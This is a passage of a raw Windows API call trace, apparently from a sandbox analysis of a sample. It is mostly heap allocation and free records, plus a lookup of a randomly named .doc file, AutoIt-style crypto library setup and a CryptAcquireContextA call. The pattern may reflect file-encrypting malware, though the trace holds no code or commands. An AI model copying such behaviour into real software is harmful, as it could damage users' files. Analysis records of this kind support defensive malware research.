lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe622a990, ftCreationTime.dwHighDateTime=0x1d5ea8c, ftLastAccessTime.dwLowDateTime=0xb20b0420, ftLastAccessTime.dwHighDateTime=0x1d5e656, ftLastWriteTime.dwLowDateTime=0xb20b0420, ftLastWriteTime.dwHighDateTime=0x1d5e656, nFileSizeHigh=0x0, nFileSizeLow=0xf8af, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="J30FxxC-.doc", cAlternateFileName="")) returned 0xa874d0 [0264.214] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0264.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0264.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0264.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.215] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.216] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0264.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.216] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.216] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.217] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0264.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0264.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0264.217] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0264.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.219] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0264.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0264.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0264.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0264.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0264.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.221] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.221] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0264.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0264.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.222] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0264.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.223] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0264.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.224] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0264.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0264.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.225] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.225] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.226] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0264.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0264.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.227] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0264.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0264.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0264.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0264.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0264.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0264.228] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0264.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0264.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0264.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.229] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 